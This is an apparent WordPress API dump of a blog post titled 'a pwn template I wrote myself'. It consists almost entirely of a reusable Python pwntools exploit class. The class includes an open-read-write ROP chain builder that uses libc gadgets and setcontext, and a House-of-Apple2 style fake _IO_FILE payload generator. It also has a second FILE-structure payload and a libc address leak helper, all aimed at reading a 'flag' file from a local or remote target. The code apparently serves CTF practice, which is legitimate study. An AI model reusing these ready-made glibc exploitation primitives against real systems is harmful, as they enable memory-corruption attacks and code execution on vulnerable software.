\u81ea\u5df1\u7f16\u7684pwn\u7684\u677f\u5b50<\/p>\n\n\n\n
# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport abc\nimport logging\nimport os\nimport re\nimport six\nimport string\nimport subprocess\nimport sys\nimport threading\nimport time\n\nfrom six.moves import range\n\nfrom pwnlib import atexit\nfrom pwnlib import term\nfrom pwnlib.context import context\nfrom pwnlib.log import Logger\nfrom pwnlib.timeout import Timeout\nfrom pwnlib.tubes.buffer import Buffer\nfrom pwnlib.util import misc\nfrom pwnlib.util import packing\nfrom pwnlib import qemu\nfrom pwnlib.context import context\nfrom pwnlib.log import getLogger\nfrom pwnlib.timeout import Timeout\nfrom pwnlib.tubes.tube import tube\nfrom pwnlib.util.misc import parse_ldd_output\nfrom pwnlib.util.misc import which\nfrom pwnlib.util.misc import normalize_argv_env\nfrom pwnlib.util.packing import _need_bytes\nfrom pwn import *\nfrom pwncli import *\nclass mypwn():\n procedurename=None\n host=None\n port=None\n procedure=None\n def __init__(self, procedurename):\n self.procedurename=str(procedurename)\n if ':' in self.procedurename:#\u5982\u679c\u662f\u8fdc\u7aef\n self.host,self.port=self.procedurename.split(':')\n self.procedure=remote(self.host,int(self.port))\n else:\n self.procedure=process(self.procedurename)\n def debug(self):\n attach(self.procedure)\n pause()\n def sd(self,payload):\n self.procedure.send(payload)\n def sda(self,delim,payload,timeout=0):\n if timeout == 0:\n self.procedure.sendafter(delim,payload)\n else:\n self.procedure.sendafter(delim,payload,timeout=timeout)\n def sl(self,payload):\n self.procedure.sendline(payload)\n def sla(self,delim,payload,timeout=0):\n if timeout == 0:\n self.procedure.sendlineafter(delim,payload)\n else:\n self.procedure.sendlineafter(delim,payload,timeout=timeout)\n def ia(self):\n self.procedure.interactive()\n def rcv(self,num):\n self.procedure.recv(num)\n def rcvu(self,delim,timeout=0):\n if timeout == 0:\n self.procedure.recvuntil(delim)\n else:\n self.procedure.recvuntil(delim,timeout=timeout)\n def rnu(self,delim,size,timeout=0):\n if timeout == 0:\n self.procedure.recvuntil(delim)\n self.procedure.recv(size)\n else:\n self.procedure.recvuntil(delim,timeout=timeout)\n self.procedure.recv(size)\n def uu64(self):\n return u64(self.procedure.recv(6).ljust(8,b'\\x00'))\n\n def gift(self, delim):\n self.procedure.recvuntil(delim)\n content = self.procedure.recv(14)\n return int(content, 16)\n '''\n \u53c2\u6570\u8bf4\u660e\uff1a\n libcversion\uff1a\u663e\u793a\u6307\u51falibc\u7248\u672c\uff0c\u59822.35,2.23\u7b49\n libcelf\uff1a\u4f20\u5165\u4e00\u4e2alibc\u7684elf\u6587\u4ef6\n libcbase\uff1a\u4f20\u5165libc\u57fa\u5740\n flagaddr\uff1aflag\u5b57\u7b26\u4e32\u5730\u5740\n payloadposition\uff1a\u8fd9\u6bb5payload\u4f60\u653e\u5728\u54ea\u91cc\u4e86\uff0c2.29\u4ee5\u4e0b\u5c31\u662frdi\u6307\u5411\u7684\u4f4d\u7f6e\uff0c2.29\u4ee5\u4e0a\u5c31\u662frdx\u6307\u5411\u7684\u4f4d\u7f6e\n \u4f8b\uff1aorw(2.35,libc,libcbase,flagaddr,target_addr)\n '''\n\n def orw(self, libcversion, libcelf, libcbase, flagaddr, payloadposition): # libcversion\u7528\u4e8e\u5224\u65ad\u662f2.29\u4ee5\u4e0a\u8fd8\u662f\u4ee5\u4e0b\uff0clibcelf\u4f20\u5165\u7684\u662f\u4e00\u4e2aELF\u6587\u4ef6\n libcversion = str(libcversion)\n libcversion = int(libcversion.split('.')[1], 10)\n rop = ROP(libcelf)\n rsp = payloadposition + 8\n\n if libcversion >= 29:\n pop_r12 = rop.find_gadget(['pop r12', 'ret']).address + libcbase\n pop_rsi = rop.find_gadget(['pop rsi', 'ret']).address + libcbase\n pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address + libcbase\n pop_rax = rop.find_gadget(['pop rax', 'ret']).address + libcbase\n pop_r12_r13 = rop.find_gadget(['pop r12', 'pop r13', 'ret']).address + libcbase\n pop_rax_rdx_rbx = rop.find_gadget(['pop rax', 'pop rdx', 'pop rbx', 'ret']).address + libcbase\n syscall = rop.find_gadget(['syscall', 'ret']).address + libcbase\n setcontextaddr = libcelf.symbols['setcontext'] + 61 + libcbase\n payload = p64(0) + p64(2)\n payload += p64(syscall) + p64(pop_r12)\n payload += p64(setcontextaddr) + p64(pop_rsi)\n payload += p64(flagaddr) + p64(pop_rdi)\n payload += p64(3) + p64(pop_rax)\n payload += p64(0) + p64(syscall)\n payload += p64(pop_r12_r13) + p64(flagaddr)\n payload += p64(4) + p64(pop_rax_rdx_rbx)\n payload += p64(1) + p64(300)\n payload += p64(0) + p64(pop_r12)\n payload += p64(rsp) + p64(pop_rax)\n payload += p64(1) + p64(pop_rdi)\n payload += p64(1) + p64(syscall)\n else:\n pop_rax = rop.find_gadget(['pop rax', 'ret']).address + libcbase\n syscall = rop.find_gadget(['syscall', 'ret']).address + libcbase\n pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address + libcbase\n pop_rdx_rsi = rop.find_gadget(['pop rdx', 'pop rsi', 'ret']).address + libcbase\n pop_r13_r14_r15 = rop.find_gadget(['pop r13', 'pop r14', 'pop r15', 'ret']).address + libcbase\n payload = p64(pop_rax) + p64(2) # open\n payload += p64(syscall) + p64(pop_rdx_rsi)\n payload += p64(300) + p64(flagaddr)\n payload += p64(pop_rdi) + p64(3)\n payload += p64(pop_rax) + p64(0) # read\n payload += p64(syscall) + p64(pop_r13_r14_r15)\n payload += p64(0) + p64(flagaddr)\n payload += p64(4) + p64(pop_rdi)\n payload += p64(1) + p64(pop_rax) # write\n payload += p64(1) + p64(syscall)\n payload += p64(rsp) + p64(pop_rax)\n return payload\n\n '''\n target_addr\u6307\u5411rdx\u7684\u4f4d\u7f6e\uff0c\u5373orwpayload\u6240\u5728\u7684\u4f4d\u7f6e\n payloadposition\u6307\u5411\u6574\u4e2aapple2 payload\u7684\u6240\u5728\u4f4d\u7f6e\uff0c\u5373rdi(f2)\u7684\u4f4d\u7f6e\uff0c\u6574\u4e2apayload\u662f\u4ecerdi\u6307\u5411\u4f4d\u7f6e\u5f00\u59cb\u7b97\u7684\uff08\u4e0d\u662f\u5806\u5757\u53ef\u5199\u4f4d\u7f6e\uff09,\u5982\u679c\u6709f1\u7684\u8bdd\uff0c\u90a3\u4e48\u5b83\u5c31\u662ff1.chain\n magic_gadget\u4f20\u5165mov rdx,[rdi+8];...;call [rdx+0x20]\u7684\u5730\u5740\n '''\n\n def apple2(self, payloadposition, libcbase, libcelf, magic_gadget):\n data = ''\n f2 = IO_FILE_plus_struct()\n f2._IO_read_ptr = payloadposition+0x270\n f2._IO_write_ptr = 1\n f2._flags2 = 8\n # f2._lock = _lock\n f2._mode = 0\n f2._wide_data = payloadposition + 0x100\n f2.vtable = libcelf.symbols['_IO_wfile_jumps'] + libcbase\n data = flat({\n 0x0: bytes(f2),#payloadposition\n 0x100: {\n 0: [0, 0, 0, 0, 0, 0, 0],\n 0xe0: payloadposition + 0x200,\n },\n 0x240:b'flag\\0',\n 0x248:[0,0,0],\n 0x268: magic_gadget,\n 0x270: self.orw(2.35,libcelf,libcbase,payloadposition+0x240,payloadposition+0x270)\n })\n return data\n\n\n def cat(self,payloadposition, libcbase, libcelf):\n f2 = IO_FILE_plus_struct()\n f2._IO_read_ptr = payloadposition + 0x200\n f2._IO_write_ptr = 1\n f2._mode = 1\n f2._lock = payloadposition\n f2._wide_data = payloadposition + 0xd0\n f2.vtable = libcelf.symbols['_IO_wfile_jumps'] + libcbase + 0x10\n flagaddr = payloadposition + 0x120\n data = flat({\n 0x0: bytes(f2)[16:], # payloadposition\n 0xd0: [0, 0],\n 0xe0: payloadposition + 0x200,\n 0xf0: {\n 0: [0, 0, 0, 0],\n 0x20: b'flag\\0',\n 0xb0: payloadposition + 0x208,\n },\n 0x1f0: self.orw(2.35,libcelf,libcbase,flagaddr,payloadposition+0x200),\n })\n return data\n\n\n\ndef iofile(flags=0,read_ptr=0,read_end=0,read_base=0,\n write_base=0,write_ptr=0,write_end=0,\n buf_base=0,buf_end=0,\n save_base=0,backup_base=0,save_end=0,\n markers=0,chain=0,fileno=0,flag2=0,lock=0):\n f = p64(flags) + p64(read_ptr) + \\\n p64(read_end) + p64(read_base) + \\\n p64(write_base) + p64(write_ptr) + \\\n p64(write_end) + p64(buf_base) + \\\n p64(buf_end) + p64(save_base) + \\\n p64(backup_base) + p64(save_end) + \\\n p64(markers) + p64(chain) + \\\n p64(fileno) + p64(flag2) + \\\n p64(0) + p64(lock)\n f = f.ljust(0xd0,b'\\x00')\n return f\n\nif __name__ == '__main__':\n p=mypwn('.\/srop')\n # sh=process('srop')\n p.debug()\n # p.ia()\n # sh.sendlineafter()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"\u81ea\u5df1\u7f16\u7684pwn\u7684\u677f\u5b50<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-308","post","type-post","status-publish","format-standard","hentry","category-pwn"],"_links":{"self":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/comments?post=308"}],"version-history":[{"count":2,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/308\/revisions"}],"predecessor-version":[{"id":324,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/308\/revisions\/324"}],"wp:attachment":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/media?parent=308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/categories?post=308"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/tags?post=308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}